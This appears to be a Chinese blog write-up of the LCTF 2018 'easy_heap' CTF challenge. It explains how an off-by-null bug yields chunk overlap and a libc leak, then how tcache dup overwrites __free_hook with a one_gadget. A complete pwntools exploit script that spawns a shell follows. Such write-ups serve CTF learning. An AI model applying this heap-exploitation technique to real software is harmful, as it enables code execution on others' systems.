[off by null + tcache dup]lctf_easy_heap

最新推荐文章于 2023-04-06 20:03:41 发布
最新推荐文章于 2023-04-06 20:03:41 发布
阅读量236 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/116949159
版权

[off by null + tcache dup]lctf_easy_heap

1.ida 分析

  • malloc函数中输入content存在off by null

    在这里插入图片描述

2.思路

  1. 通过off by null,造成chunk overlapping,泄漏Libc的地址

    1. 这里存在off by null 通过unstored bin就可以泄漏,但由于tcache的存在,需要注意
    2. 先申请10个chunk,释放3-9,填满tcache bin之后,再释放0,1,2编号的chunk进入unstored bin
      • 这一步是为了构造出合法的presize
    3. 再次申请7个chunk,清空tcache bin,之后再申请3个chunk,编号为7,8,9在0xb1的堆下面
    4. free(8)将编号8的chunk放入tcache
    5. 释放6个chunk,此时tcache bin满了,释放编号7的chunk,进入unstored bin
    6. 申请6个chunk,只留下tcache bin中的编号8的chunk,rm_tcache(6)
    7. add(0x78,‘8’),此时chunk 8,触发off by null将chunk 9的preinuse设置为0
    8. free(9),此时触发向前合并
    9. rm_tcache(7),清空tcahce bin, add(2,‘a’) 即chunk 7
    10. show(7),泄漏libc的地址,则onegadget地址以及free_hook的地址就有了
    11. add(0x2,‘b’),之后内存中只有一个ustored bin 即chunk 9
    12. free(7),先往tcache bin中放入一个bin
    13. free(9),紧接着触发 tcache dup

  2. 通过tcache dup,将free_hook,修改为onegadget

3.exp

from pwn import *
#p = process('./easy_heap')
p = process(['./easy_heap'],env={"LD_PRELOAD":"./libc64.so"})
context.log_level = 'debug'

def add(size,cont):
    p.sendlineafter('> ','1')
    p.sendlineafter('> ',str(size))
    p.sendlineafter('> ',cont)


def free(index):
    p.sendlineafter('> ','2')
    p.sendlineafter('>',str(index))

def show(index):
    p.sendlineafter('> ','3')
    p.sendlineafter('> ',str(index))

def exit():
    p.sendlineafter('> ','4')

def add0():
    p.sendlineafter('> ','1')
    p.sendlineafter('> ','0')

def fill_tcache(start,end):
    for i in range(start,end,1):
        free(i)

def rm_tcache(num):
    for i in range(num):
        add0()

for i in range(10):
    add0()

#fill tcache
fill_tcache(3,10)

free(0)
free(1)
free(2)

#add chunk0-6
rm_tcache(7)

add(0x2,'7')
add(0x2,'8')
add(0x2,'9')

#tcache full
free(8) #last tcache  bin
fill_tcache(0,6)

#unstored bin
free(7)

#only left chunk8
rm_tcache(6)

# set chunk9 preinuse = 0
add(0xf8,'8')
fill_tcache(0,7)

#triger overlap
free(9)
#gdb.attach(p)
rm_tcache(7)
add(0x1,'a')

show(7)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 0x3ebca0
log.success('libc_base=>'+hex(libc_base))
libc = ELF('./libc64.so')
one = libc_base + 0x4f322
free_hook = libc_base + libc.sym['__free_hook']
log.success('one=>'+hex(one))
log.success('free_hook=>'+hex(free_hook))

add(0x2,'c')
#gdb.attach(p)
free(7)
free(9)

add(0x10,p64(free_hook))
fill_tcache(0,7)
rm_tcache(7)
#add(0x10,'d')
add(0x10,p64(one))
free(0)

#pause()
#gdb.attach(p)
p.interactive()
huzai9527
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LCTF2018 PWN easy_heap 远程环境搭建
哒君的博客
08-08 797
一直很头疼环境的问题,需要目标环境的glibc版本是2.27,而我的是2.23 如果开启第二个虚拟机占用内存太大,所以我选择用docker 于是终于找到了能在libc2.27下工作的gdb插件pwngdb(注意不是那个pwndbg) 所以这个镜像可以作为Tcache机制题目的本地测试容器 GitHub docker镜像:链接:https://pan.baidu.com/s/1eCIbJl3Ig9...
unsigned long long 溢出 乘_二进制安全之堆溢出(系列)—— off by null
weixin_39813009的博客
11-30 73
本文是二进制安全之堆溢出系列的第七章节,主要介绍off by null。原理思路通过修改chunk的prev_inuse位,达到一个堆块重叠的作用流程修改下一个堆块B的size的最后一字节为0,即prev_inuse置0,size随之减小,逻辑上分为0×100的B1+0×20的B2在B2伪造一个chunk,其prev_inuse改为1,用以防止B和A发生前向合并,并在后面malloc fire时越...
HITCON_2018_children_tcache关于off by null
wuyvle的博客
04-05 1118
创建Chunk时,使用了strcpy函数,而这个函数会在将字符串转移后在末尾添加一个x00,因此此处存在一个off-by-null漏洞。 思路 off by null 想到堆重叠(overlapping),和 16 区别主要是申请的 unsorted bin 大小需要大于 0x408 来避免 chunk 放入 tcache 。 溢出修改 inuse 位比较简单,申请使用下一个 chunk prev_size 的堆直接写满就行,就是 prev_size 怎么写需要想一下办法。因为 free chunk 之前.
tcache-off-by-null-LCTF2018_easy_heap
csdn546229768的博客
02-09 556
保护 分析 main: malloc: free: puts: 这题的保护措施做的很好,常见的free函数也没问题,但是这题有个off-by-null的漏洞,因为这题的限制条件较多所以考虑用堆重叠(overlapping heap chunk),然后就可以进行对重叠的chunk进行double free写入one_gadget到free_hook进行getshell 因为这题写入content时限制了\x00字符,那么在写入字节流时就会断掉写入 首先构造unsortbin进行合并的prev_siz
sctf_2019_easy_heap off-by-null劫持IO_FILE,理解 0ctf2015 free_note unsortedbin-double_free使用
weixin_46521144的博客
08-14 307
分析以及漏洞点 本身off-by-null没什么可以再说的,但是这道题没有show函数,就必须想到要劫持IO_FILE。但是之前就一直有个问题就是既然unsortedbin中地址无法取出,怎么能写到tcache或者fastbin中?之前许多题目因为正好有类似的漏洞,但感觉不是很普世。这次只有一个off-by-null就实现了这一点,因此看完之后恍然大悟。明白了一般性的劫持IO_FILE泄露libc的方法。 关键点:构造chunk overlapping,之后用一个大的unsortedbin包裹住这个chun
heap_exploit_2.31
03-21
tcache dup tcache double free fastbin双免费 botcake的房子 其他堆利用技术与how2heap相同,因此我不编写其他代码-.- pwngdb pwngdb是用于堆利用的出色gdb脚本,但是在glibc 2.31中,tcache结构发生了
heap-viewer:一个IDA Pro插件,用于检查glibc堆,专注于漏洞利用开发
04-13
堆查看器 一个IDA Pro插件,...Tcache信息(glibc> = 2.26) GraphView的链表(bins / tcache) 结构视图(malloc_state / malloc_par / tcache_perthread) 魔术工具: 取消链接合并信息释放/合并信息假Fastbin查找器
TCache-开源
04-25
TCache是​​高性能键/值存储组件。 它可以轻松地插入到任何现有的高性能,分布式内存对象缓存系统(例如MemcacheD或Dynamo)中,从而通过减少数据库负载来加速动态Web应用程序
Glibc 2.27关于Tcache的增强保护 .pdf
09-05
Glibc 2 安全防御 区块链 安全人才 自动化 区块链
how2heap:一个用于学习各种堆利用技术的存储库
04-05
演示glibc的tcache索引计算。 通过滥用fastbin空闲列表,诱使malloc返回已经分配的堆指针。 最新的 通过滥用fastbin自由列表,诱使malloc返回几乎任意的指针。 最新的 , 通过将指针放在fastbin自由列表和未...
LCTF_2018_Platform:LCTF 2018平台
05-04
LCTF 2018 platform LCTF 2018 比赛平台。 本项目中前端代码为webpack打包后的前端代码,前端源码参见。 部署 项目使用nginx+uwsgi+django部署,示例的和都已上传。 uwsgi配置文件中为控制权限使用nginx:nginx用户启动,请按需修改(大部分系统nginx用户为www-data:www-data)。然后把web目录owner修改为uwsgi的启动用户: chown -R nginx:nginx . 开发版本为python 2.7,未测试过其他版本的兼容性。 食用方法 默认后台路径 api/admin/ 可在app/backend/lctf2018_backend/urls.py中修改。 默认后台管理账号密码 admin admin123456 使用时千万别忘了 cd app/backend python manage.py change
LCTF 2018 pwn easy_heap
hanabi_sh
11-04 717
LCTF 2018 pwn easy_heap,off-by-one,null-byte-overflow
hitcon_2018_children_tcachetcache off-by-null,另一种doublefree)
m0_51251108的博客
11-06 394
hitcon_2018_children_tcache: 显然保护全开 逆向分析: add函数: 漏洞在这个strcpy函数上 delete函数: show函数:
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup
mcmuyanga的博客
03-10 969
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
LCTF2018 PWN easy_heap学习(以及tcache基础认识)
a2590035252的博客
09-24 399
适合于广大像我一样的pwn爱好者
(补题)LCTF2018 PWN easy_heap超详细讲解
hollk’s blog
02-08 2264
这道题是wiki上tcache attack 的Challenge 1,题目需要自己找一下。尝试上传到CSDN上,但总是提示已有,不知道是什么情况。这道题总的来说比较复杂,涉及到的知识点有:tcache分配、unsorted bin分配、堆块合并分割、tcache检查、hook。吐槽一点,堆块的id为什么非得从0开始啊!啊!啊!啊!总的来说收获满满,对tcache这类的题目理解更加深刻了(*^▽^*)
好好说话之Tcache Attack(2):tcache duptcache house of spirit
hollk’s blog
02-02 1792
这篇文章介绍了两种tcache的利用方法,tcache duptcache house of spirit,两种方法都是用how2heap中的例题作为讲解。由于tcache attack这部分的内容比较多,所以分开几篇文章去写。例题后补,写完例题后可能会进行重新排版,内容不会少的!!!
Tcache漏洞
m0_52343643的博客
04-06 260
tcache 为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。正式提供了该机制,并默认开启647):放入相应 bins 中的 chunk 都会在其用户数据中包含,指向同 bins 中的下一个 chunk。
glibc2.31 off-by-null orw 攻击手法刨析
qq_39948058的博客
08-26 842
前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿, 仅large bin chunk的堆块伪造,并即可实现堆块重叠 并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造 再通过上述demo任意写控制参数,从而在assert后即可进行栈迁移 glibc2.31 off-by-null orw 攻击手法刨析 Free(3) 3---->un
linux下gdb最终显示tcache_get错误,会是什么原因?
最新发布
07-13
当使用GDB调试程序时,如果最终显示 "tcache_get" 错误,可能是由于以下原因之一: 1. 未正确安装或配置glibc:GDB 是基于 glibc 的调试工具,如果 glibc 未正确安装或配置,可能会导致 tcache_get 错误。请确保...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值